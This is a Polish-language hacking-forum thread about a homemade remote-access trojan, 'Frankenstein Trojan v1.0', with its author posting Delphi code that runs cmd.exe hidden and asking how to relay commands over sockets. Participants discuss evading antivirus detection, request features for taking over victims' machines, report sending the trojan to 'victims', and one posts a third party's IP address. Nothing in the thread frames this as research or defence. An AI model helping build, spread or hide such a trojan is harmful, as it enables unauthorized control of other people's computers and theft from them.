Frankenstein Trojan v 1.0

[Reptile ReX]

Mam pewien problem: mianowicie "rozkminiam" CMD-znalazłem bardzo fajny kod:

Form1, Memo1, Edit1, Button1:

function ExecuteConsole(Executable:PChar; CommandLine:PChar; Directory:PChar):boolean;

const bufSize     = 256;

var   readPipe    :THandle;

      writePipe   :THandle;

      security    :SECURITY_ATTRIBUTES;

      info        :STARTUPINFO;

      process     :PROCESS_INFORMATION;



      buf         :array[0..bufSize-1] of char;

      bytesRead   :DWord;

      text        :string;

      line        :string;

      newLinePos  :integer;

begin

result:=FALSE;

security.nLength:=sizeof(security);

security.lpSecurityDescriptor:=nil;

security.bInheritHandle:=TRUE;

Application.ProcessMessages;

if CreatePipe(readPipe, writePipe, @security, 0) then

  begin

  ZeroMemory(@info, sizeof(info));

  with info do

    begin

    cb := sizeof( info );

    dwFlags := STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;

    wShowWindow := SW_HIDE;

    hStdInput := 0;

    hStdOutput := writePipe;

    hStdError := writePipe;

    end;

  if CreateProcess(Executable, CommandLine, nil, nil, TRUE, 0, nil, Directory, info, process) then

    begin

    CloseHandle( writePipe );

    text:='';

    while ReadFile( readPipe, buf, bufSize, bytesRead, nil) do

      begin

      text:=text+buf;

        repeat

        newLinePos:=Pos(#13, text);

        if (newLinePos=0) then break;

        line:=copy(text,1, newLinePos-1);

        delete(text, 1, newLinePos);

        Form1.Memo1.Lines.Add(line);

        Application.ProcessMessages;

        until Application.Terminated;

      ZeroMemory(@buf, bufSize);

      end;

    result:=TRUE;

    end;

  CloseHandle( readPipe );

  end;

end;



procedure TForm1.Button1Click(Sender: TObject);

begin

ExecuteConsole('c:WINDOWSsystem32cmd.exe', PChar('/C "'+Edit1.Text+'"'), 'c:');

Edit1.Text:='';

end;

Na razie tylko go testowałem wydając polecenia "sobie" z Klienta.
Ale nie mam pojęcia, jak zrobić, aby wydawać te polecenia z klienta do serwera i odbierać odpowiedź z serwera do klienta (Client-Serwer Socket)

Proszę o Pomoc

Inne:
@UP Anty Wirusy i FW wyłączą się po zakończeniu procesu ?- wątpię, mojego nie wyłączy, ale jeżeli tak to proszę o podanie nazw procesów

Dodam Screena z Prototypu CMD:

Tak będzie wyglądać jak mi ktoś pomoże xd

 

[amex]

Wg mnie obecna wersja trojana to nic specjalnego, zwlaszcza, że dziala tylko na ptokole TCP/IP, i jak już ktoś to napisał, to zwykła zabawka

Ale nie mam pojęcia, jak zrobić, aby wydawać te polecenia z klienta do serwera i odbierać odpowiedź z serwera do klienta (Client-Serwer Socket)[/b]

w clientcie masz wydarzenie OnServerMessage (albo read) a w serverze OnClientMessege, jeśli o to Ci chodzi

 

[Yakuzer]

a gdzie jest opcja ss ? Jakos nigdzie jej nie widac...

 

[Uther92]

Ładny, "funkcjonalny" - więcej takich

 

[nazgul100]

Fajny, lecz G DATA TC 08 przy skanowaniu go wykrywa (Tylko przy skanowaniu- Ochrona w czasie rzeczywistym go nie wykrywa

). Ogólnie to jeszcze nie przetestowałem bo gdy che uruchomić plik klient wyskakuje mi odmowa dostępu ;/ Można od razu stworzyć ustawienia serwera, czy trzeba najpierw wysłać?

 

[fr0zon]

ArcaVir 2008 wykrywa:

Trojan.Polka.a

 

[Reptile ReX]

Program aktualnie jest super wykrywalny dzięki ludzikom których jedynym zajęciem jest wchodzenie na

www.virustotal.com

Za niedługo wyjdzie wersja 0.2 na Protokole GG

 

[nazgul100]

Ogólnie fajny... Lecz praktycznie żadnych przydatnych funkcji tak więc może się szybko znudzić :] Proponowałbym opcje zaproponowane powyżej, jak i przeglądarkę plików ofiary. Przydatny by był edytor rejestru. Nie wiem czy da się to zrobić, ale można by dodać dodatkowo możliwość ustalenia zdalnego połączenia (wiem ze się jakoś da, lecz mi chodzi o to żeby za pomocom jednego kliknięcia móc przejąć kontrole)

gólnie fajny, po zbindowaniu mało wykrywalny. Teraz tylko czekać na next versie, i będzie super :]

P.S:Możesz dodać jeszcze możliwość zmiany ikony serwera w programie/oraz generowanie plików .bat

 

[Reiben_]

Witam.
Mam problem z tym trojanem. Po przyjacielsku wyslalem koledze tego trojana(wie ze to jest trojan)
Odpalil serwer, Ja odaplilem Klienta, wywalam jego ip klikam "polacz"
I wyskakuje mi bug typu "wystapil blad", ponizej daje screena



Wie ktos moze o co chodzi? :|
@edit
Antivir go wykrywa

 

[fr0zon]

Zgdoze sie ze pacany ^%$^$%#%#% , ^&%^$%%, T^$%^#%^$%^& ....
Wysyłaja na skany... Debile dosłownie. Jeśli nie ma sie pewności czy np Avast wykryje to se kurna niech zainstaluja avasta i ku... spr.
Takixh lamerów którzy wysyłają panicznie na www.virustotal.com to bym nie wiem co zrobił.

ehhh... Ale wybuchłem złością

p.s - Chcesz se spr. trojana to sobie Virtual PC zainstaluj z jakims systemem i AV. Kiereje te słowa do tych co skanują na www.virustotal.com

Jeszcze troche kazdy trojan bedzie rozpoznawalny przez kazdy AV

 

[biOtX]

Aha . Czyli juz go lepiej nie sciagac ?

Boze ludzie i po co takiego fajnego konika skasowaliscie ?

Ciekawe co by bylo, jakbyscie sami tekiego wykombinowali, a potem ktos go spisal na straty .

Raptile moze uda ci sie zrobic podobny, ale mniej wykrywalny. Nie przejmuj sie botami, czekam na kolejna wersje

.

@EDIT :

Sciagnelem , wyslalem ( ofiara mowila, ze jakis blad wyskoczyl, to znaczy, ze wlaczyla ) ... nie chce sie polaczyc

 

[Reptile ReX]

/\ Widocznie ma wew. IP, albo coś blokuje

Statystyki
SpeedyShare
This file has been downloaded 762 times
Uploaded 55 days 23 hours 57 minutes ago

Wykrywalność:

 

[sebik90]

Kolejny trojan zrobiony metoda kopiuj => wklej i nawet nie zaprzeczaj bo wszystkie funkcje ktore posiada sa opisane w samouczkach.

 

[nitr0]

@UP większość takich jest

zresztą co miałby tu kombinować, podstawowe rzeczy niepotrzebnej zabawki ma xP
a co do programu to lepszą opcją jest "klatka dla myszki" a nie zawiecha jej

 

[Reptile ReX]

Lol? nie jest robiony kopiuj - wklej

zresztą spójrz na początkową wykrywalność jakbym robił kopiuj - wklej nie wiem czy w 20 av bym się zmieścił, i powiem ci jedną bardzo ważną rzecz:
Nigdy nie mów czegoś bez 100% pewności bo możesz kogoś urazić. To tyle

Baj

 

[nitr0]

tia... nie mówię że wszystko. bo masz rację - w 20 byś się nie zmieścił. chodzi mi o opcje jak on ma. jestem - i to na 100% - pewny że nie wymyśliłeś sam jak obrócić ekran, odwrócić kolory czy tam chować start, bo reszta mimo że jest znana właśnie z takich projektów to można napisać je rzeczywiście z głowy.

pzdr

 

[Master23]

A mi nie działa

Klikam na połącz i sie nie połącza (P.S Gostka ip 83.144.92.10) Pomocy

 

[nitr0]

a jest w NAT ?

 

[Master23]

prosze dokładniej bo nie rozumiem

 

[mical47]

Witam wszystkich...mam pytanie...jak korzystac z tych wirusów??Gdy ściągam je to avast wykrywa wirusa,następnie wyskakuje okienko , aby go skasowac.Lecz ja go chce zatrzymać. Jak zrobić żeby avast mi pozwolił je zachować i jak zrobić aby ich nie uszkadzał??